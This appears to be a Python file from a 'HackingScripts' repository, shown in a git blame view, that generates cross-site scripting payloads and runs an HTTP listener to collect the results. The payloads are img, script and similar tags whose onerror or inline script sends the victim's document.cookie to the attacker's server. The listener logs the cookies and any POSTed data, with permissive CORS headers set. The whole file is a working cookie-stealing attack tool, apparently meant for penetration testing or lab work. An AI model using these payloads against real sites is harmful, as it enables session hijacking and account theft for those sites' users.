HackingScripts/xss_handler.py

109 lines
3.3 KiB
Python
Raw Normal View History

2020-06-02 14:15:03 +02:00
#!/usr/bin/env python
2020-09-28 15:44:39 +02:00
from hackingscripts import util
2020-06-02 14:15:03 +02:00
import sys
import http.server
import socketserver
2020-06-02 15:25:10 +02:00
from http.server import HTTPServer, BaseHTTPRequestHandler
2020-06-02 14:15:03 +02:00
2021-05-07 23:52:08 +02:00
# returns http address
def getServerAddress(address, port):
2020-09-22 20:55:06 +02:00
if port == 80:
2021-05-07 23:52:08 +02:00
return "http://%s" % address
2020-06-02 14:15:03 +02:00
else:
2021-05-07 23:52:08 +02:00
return "http://%s:%d" % (address, port)
# returns js code: 'http://xxxx:yy/?x='+document.cookie
def getCookieAddress(address, port):
return "'%s/?x='+document.cookie" % getServerAddress(address, port)
2020-09-22 20:55:06 +02:00
def generatePayload(type, address, port):
payloads = []
cookieAddress = getCookieAddress(address, port)
media_tags = ["img","audio","video","image","body","script","object"]
if type in media_tags:
payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress))
if type == "script":
payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
2021-05-07 23:52:08 +02:00
payloads.append('<script src="%s/xss" />' % getServerAddress(address, port))
2020-09-22 20:55:06 +02:00
if len(payloads) == 0:
2020-06-02 14:15:03 +02:00
return None
2020-09-22 20:55:06 +02:00
return "\n".join(payloads)
2020-06-02 15:25:10 +02:00
class XssServer(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def _html(self):
content = f"<html><body><h1>Got'cha</h1></body></html>"
return content.encode("utf8") # NOTE: must return a bytes object!
def do_GET(self):
self._set_headers()
2021-05-07 23:52:08 +02:00
if self.path == "/xss":
2022-12-09 14:54:06 +01:00
cookie_addr = getCookieAddress(util.get_address(), listen_port)
2021-05-07 23:52:08 +02:00
self.wfile.write(cookie_addr.encode())
else:
self.wfile.write(self._html())
2020-06-02 15:25:10 +02:00
def do_HEAD(self):
self._set_headers()
2020-09-28 15:44:39 +02:00
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
BaseHTTPRequestHandler.end_headers(self)
def do_OPTIONS(self):
self.send_response(200, "ok")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
# self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
# self.send_header("Access-Control-Allow-Headers", "Content-Type")
self.end_headers()
2020-06-02 15:25:10 +02:00
def do_POST(self):
self._set_headers()
2020-09-28 15:44:39 +02:00
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
post_data = self.rfile.read(content_length)
print(post_data)
2020-06-02 15:25:10 +02:00
self.wfile.write(self._html())
2020-06-02 14:15:03 +02:00
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: %s <type> [port]" % sys.argv[0])
exit(1)
listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
payload_type = sys.argv[1].lower()
2022-12-09 14:54:06 +01:00
local_address = util.get_address()
2020-06-02 14:15:03 +02:00
# choose random port
if listen_port is None:
sock = util.openServer(local_address)
if not sock:
exit(1)
listen_port = sock.getsockname()[1]
sock.close()
payload = generatePayload(payload_type, local_address, listen_port)
if not payload:
2020-09-22 20:55:06 +02:00
print("Unsupported payload type")
2020-06-02 14:15:03 +02:00
exit(1)
print("Payload:")
print(payload)
print()
2020-06-02 15:25:10 +02:00
httpd = HTTPServer((local_address, listen_port), XssServer)
print(f"Starting httpd server on {local_address}:{listen_port}")
httpd.serve_forever()